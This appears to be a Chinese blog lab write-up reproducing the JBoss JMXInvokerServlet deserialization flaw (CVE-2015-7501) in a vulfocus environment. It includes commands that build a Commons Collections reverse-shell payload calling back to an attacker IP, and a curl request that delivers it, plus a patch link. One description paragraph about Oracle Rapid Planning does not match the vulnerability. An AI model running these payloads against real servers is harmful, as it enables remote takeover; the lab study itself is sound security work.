JBoss JMXInvokerServlet 反序列化漏洞 CVE-2015-7501 已亲自复现

JBoss JMXInvokerServlet 反序列化漏洞 CVE-2015-7501 已亲自复现

漏洞名称

漏洞描述

在Oracle Rapid Planning 12.1/12.2.2中发现了一个被归类为"严重"的漏洞。受到影响的是一些未知的组件处理中间层。升级可消除此漏洞。在泄露漏洞后立即发布了可能的缓解措施。

这是经典的JBoss反序列化漏洞,JBoss在/invoker/JMXInvokerServlet请求中读取了用户传入的对象,然后我们利用Apache Commons Collections中的Gadget执行任意代码。

影响版本

Redhat Jboss_Operations_Network 3.0

Redhat Jboss_Enterprise_Brms_Platform 5.0.0

Redhat Jboss_Enterprise_Application_Platform 4.3.0

Redhat Jboss_Enterprise_Application_Platform 5.0.0

Redhat Jboss_Data_Virtualization 5.0.0

Redhat Jboss_Enterprise_Application_Platform 6.0.0

Redhat Xpaas 3.0.0

Redhat Jboss_Enterprise_Soa_Platform 5.0.0

Redhat Jboss_Fuse_Service_Works 6.0

Redhat Subscription_Asset_Manager 1.3.0

Redhat Jboss_Bpm_Suite 6.0.0

Redhat Data_Grid 6.0.0

Redhat Jboss_A-Mq 6.0.0

Redhat Jboss_Fuse 6.0.0

Redhat Jboss_Portal 6.0.0

Redhat Jboss_Data_Virtualization 6.0.0

Redhat Openshift 3.0

Redhat Jboss_Enterprise_Brms_Platform 6.0.0

Redhat Jboss_Enterprise_Web_Server 3.0.0

漏洞复现

环境搭建

受害者IP:192.168.63.129:65336

攻击者IP:192.168.63.1

vulfocus下载链接

bash 复制代码
https://github.com/fofapro/vulfocus
git clone https://github.com/fofapro/vulfocus.git

启动vulfocus

bash 复制代码
docker-compose up -d 

环境启动后,访问http://192.168.63.129:65336即可看到一个Jboss页面,说明已成功启动。

访问路径/invoker/JMXInvokerServlet,若提示JMXInvokerServlet文件下载则说明可能存在漏洞;

漏洞利用

通过借助ysoserial的eCommonsCollections5利用链来复现。生成Payload,生成编译后的Java文件

ReverseShellCommonsCollectionsHashMap.class,生成ReverseShellCommonsCollectionsHashMap.ser文件,进行反弹shell。

bash 复制代码
javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
java -cp .:commons-collections-3.2.1.jar  ReverseShellCommonsCollectionsHashMap 192.168.63.1:7777
bash 复制代码
curl http://192.168.63.129:65336/invoker/JMXInvokerServlet --data-binary @ReverseShellCommonsCollectionsHashMap.ser

使用burp看看响应体会返回什么,抓取原始请求的响应。

由于在处理/invoker/JMXInvokerServlet请求的时候会读取用户传入的对象,那我们可以构造恶意的数据传入,当jboss处理该数据时即可执行该恶意数据,从而达到执行任意代码的效果;

将生成的ReverseShellCommonsCollectionsHashMap.ser下载到本地,burp抓包后修改为post提交方式,接着右击paste from file上传生成的ReverseShellCommonsCollectionsHashMap.ser文件;(注:攻击机要先开启监听)

修复建议

Red Hat JBoss Portal任意代码执行漏洞(CVE-2015-7501)的补丁--- 登录红帽门户安装对应修复版本

补丁链接:https://access.redhat.com/security/vulnerabilities/2059393

总结

如果payload请求成功,在响应头中返回的状态码为200,在响应体中抛出 org.jboss.invocation.InvocationException异常信息,则需要结合网络日志和流量日志进行分析。如果返回其他状态码,则攻击失败。

相关推荐
Chockmans6 分钟前
春秋云境CVE-2022-32992(文件上传和sql注入)保姆级教学
数据库·sql·安全·网络安全·网络攻击模型·春秋云境·cve-2022-32992
m0_7381207221 分钟前
渗透测试基础知识——从零认识JWT(JSON Web Token)身份令牌
服务器·前端·安全·web安全·网络安全·json
2601_9560028143 分钟前
【完美解决】Telega纸飞机收不到验证码?短信收费弹窗提示?2026最新老号/新号全网最全复活教程(转存后看教程(看到请立即转存 资源随时失效)手机版通用
网络安全·友善·爱国·诚信
电子科技圈1 小时前
大理5G研究院加速建设面向南亚东南亚新一代信息技术产业化合作新通道
人工智能·物联网·5g·网络安全·信息与通信
深邃-1 小时前
【Web安全】-企业资产信息收集(1):信息收集介绍,域名信息收集,主域名查询,ICP备案号查询,备案实体查询,工业和信息化部政务服务平台查询,怎样收集
安全·web安全·网络安全·安全威胁分析·政务·信息收集
X7x51 小时前
数据防泄漏(DLP):企业数字资产的“隐形守护者“
网络安全·网络攻击模型·安全威胁分析·安全架构·dlp
一个在高校打杂的1 天前
honeypot之opencanary(轻量化蜜罐)
linux·网络安全·网络攻击模型·安全威胁分析·策略模式
一个脚本boy1 天前
攻防世界misc简单难度1-20题详细解法
网络安全
谪星·阿凯1 天前
Linux提权全攻略博客
linux·运维·服务器·网络安全
君如风军如风1 天前
等保2.0安全通用要求第三级别之安全物理环境
网络安全·等级保护·等保2.0·安全合规·gb/t 22239